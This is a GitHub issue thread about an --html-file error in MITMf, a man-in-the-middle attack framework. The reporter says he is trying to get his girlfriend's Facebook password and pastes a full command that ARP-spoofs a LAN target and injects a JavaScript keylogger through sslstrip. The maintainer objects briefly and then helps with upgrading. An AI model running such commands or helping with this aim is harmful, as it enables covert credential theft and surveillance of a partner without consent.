### ISSUE TITLE
--html-file error

### ISSUE THREAD

**Issue by johnbarca** [byt3bl33d3r/MITMf#38]
ok so when trying to inject my own html script it keeps giving me an erno error no such file or directory

now im 100% sure that i have listed the full directory 

i just cant get it to work ive tried everything 

any clues?

**Comment by byt3bl33d3r** [comment]
Hi, 
What version are you using? if < 0.8 try pulling the latest version and try again.. Just tried it and it works on my system

**Comment by johnbarca** [comment]
yeah mate i have the latest version

**Comment by johnbarca** [comment]
and today i got another error

**Comment by johnbarca** [comment]
just when i was going to get my girlfriends fb password

**Comment by johnbarca** [comment]
root@Unknown:~# mitmf --spoof --arp --iface wlan0 --target 192.168.1.2 --gateway 192.168.1.1  --jskeylogger
[*] MITMf v0.8 started... initializing plugins and modules
[*] Inject plugin online
[*] Javascript Keylogger plugin online
[*] Spoof plugin online
[*] ARP Spoofing enabled
[*] Setting up iptables

[*] sslstrip v0.9 by Moxie Marlinspike running...
[*] sergio-proxy v0.2.1 online
2015-01-20 13:21:28 Host resolution error: [Failure instance: Traceback: <type 'exceptions.TypeError'>: cannot concatenate 'str' and 'NoneType' objects
/usr/lib/python2.7/dist-packages/twisted/web/http.py:773:requestReceived
/usr/share/mitmf/sslstrip/ClientRequest.py:148:process
/usr/lib/python2.7/dist-packages/twisted/internet/defer.py:301:addCallback
/usr/lib/python2.7/dist-packages/twisted/internet/defer.py:290:addCallbacks
--- <exception caught here> ---
/usr/lib/python2.7/dist-packages/twisted/internet/defer.py:551:_runCallbacks
/usr/share/mitmf/sslstrip/ClientRequest.py:107:handleHostResolvedSuccess

**Comment by johnbarca** [comment]
its been working fine evrything before this

**Comment by byt3bl33d3r** [comment]
@johnbarca you shouldn't be using this for stuff like that... that particular error occurs when MITMf can't resolve a domain, nothing out of the ordinary... in regards to the html file error can you paste the entire output of the error?

**Comment by byt3bl33d3r** [comment]
@johnbarca also your using v0.8

**Comment by johnbarca** [comment]
but i have updated through

apt-get update && apt-get upgrade

and i have tried 

apt-get install mitmf

but it says one not upgraded how do i update to the latest version manually

**Comment by johnbarca** [comment]
mitmf.py: error: argument --html-file: can't open '1.html': [Errno 2] No such file or directory: 'Script.html'

**Comment by byt3bl33d3r** [comment]
@johnbarca kali currently has only v0.8 in their repos

**Comment by johnbarca** [comment]
so how would i install it

**Comment by byt3bl33d3r** [comment]
@johnbarca just do a git clone and download any missing libs
